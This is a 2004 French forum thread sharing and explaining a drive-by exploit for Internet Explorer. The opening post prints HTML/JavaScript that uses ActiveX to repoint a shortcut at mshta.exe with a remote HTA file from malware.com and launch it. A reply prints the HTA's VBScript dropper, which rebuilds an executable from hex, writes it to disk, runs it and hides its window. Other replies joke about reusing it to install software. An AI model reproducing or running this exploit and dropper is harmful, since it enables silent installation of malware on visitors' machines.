Journal : Nouvel exploit pour IE :

Posté par ploum (page perso, ) le 07 janvier 2004

http://www.internetaddict.be/index.cfm?PageID=11&nID=9601&a(...)

Le code est celui-ci :

Code:

<script>

// jelmer is in the zone
// 01.01.04 http://www.malware.com(...)
// adjust as required - many more setups

var objShell = new ActiveXObject("Shell.Application");
objFolder = objShell.NameSpace("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Accessories");
objFolderItem = objFolder.ParseName("Paint.lnk");
objShellLink = objFolderItem.GetLink;
objShellLink.Path = "mshta.exe"
objShellLink.Arguments ="http://www.malware.com/poopware.hta(...)"
objShellLink.Save("C:\\jelmer.lnk");
objShell.Open("C:\\jelmer.lnk");

</script>

(le tout dans une page html)

JE comprend pas trop c'est quoi mshta.exe ni à ce qu'est censé faire poopware.hta (c'est un code bizarre)

PS : j'ai vu cette info sur : http://www.unixtech.be(...)

> Lire le journal (10 commentaires, moyenne: 2,2).

Vous avez demandé le commentaire #325180.

Re: Nouvel exploit pour IE :

Posté par xalbat () le 07/01/2004 à 13:22. (lien). Évalué à 4.

>JE comprend pas trop c'est quoi mshta.exe ni à ce qu'est censé faire poopware.hta (c'est un code bizarre)

Le lien suivant devrait permettre de t'éclaircir, noter la remarque suivante :
Security Risk ( Virus/Trojan/Worm/Adware/Spyware ): No

http://www.liutilities.com/products/wintaskspro/processlibrary/msht(...)

Conclusion : ça lance la page hta passée en paramètre

Pour le reste du code (le hta) rien de bien sorcier

Il se planque loin de ta vue : self.MoveTo 6000,6000

Ca c'est le code binaire du logiciel (potentiellement un virus que je veux lancer sur le poste client )
t="4D,5A,44,01,05,
[...]
F,3F"

Le code pour créer le fichier .exe, vbs de base

tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
poop = "fDfdfsdsfsdfssd3s343.exe"
Set f = fso.CreateTextFile(poop, ForWriting)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
b = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(b)
Next
Else
f.Write Chr(b)
End If
Next
f.Close
runscr=1

Si le tout a bien marché, je lance le virus sinon je m'arrêre discretos.

if runscr then shell.run(poop)
on error resume next: self.close()

Chez moi ca marche pas parce que mon ordi est francisé, mais avec un peu de travail, ils vont bien réussir à nous faire un truc bien multilangue ... surtout avec un acces aussi simple à l'ensemble des répertoires
Et au boulot, tjrs sous WinXP :-(

[^]Re: Nouvel exploit pour IE :

Posté par ploum (page perso, ) le 07/01/2004 à 14:09. (lien). Évalué à 1.
donc le binaire, on peut y mettre ce qu'on veut dedans ?

PArce que c'est vrai qu'un beau ver qui installe Firebird avec une skin IE à la place de IE, ça fait rêver :)

Juste pour voir la tête des webmasters qui font des "IE only" :)
- [^]Re: Nouvel exploit pour IE :
  
  Posté par khalahan () le 07/01/2004 à 17:38. (lien). Évalué à 1.
  Ya un post qui est passé ya qq mois qui présentait un logiciel qui faisait une sorte d'apt-get install de Firebird (ca telechargeait et peut etre installait plusieurs logiciels libres) sous Windows.
  
  Il ne reste plus qu'à mettre le code de ce programme à la place d'un virus :)
  
  Bonne continuation pour l'idée lol
[^]Re: Nouvel exploit pour IE :

Posté par plagiats () le 07/01/2004 à 18:09. (lien). Évalué à 1.
Ca c'est le code binaire du logiciel (potentiellement un virus que je veux lancer sur le poste client )
t="4D,5A,44,01,05,
[...]
F,3F"

tu veux dire "le code hexadecimal du bine du logiciel" ?

plagiats

--
La mort est un phénomène naturel qui se produit par l'avalement répété de petites quantités de salive au cours d'une grande période de temps. - George Carlin

Journal : Nouvel exploit pour IE :

Re: Nouvel exploit pour IE :

[^]Re: Nouvel exploit pour IE :

[^]Re: Nouvel exploit pour IE :

[^]Re: Nouvel exploit pour IE :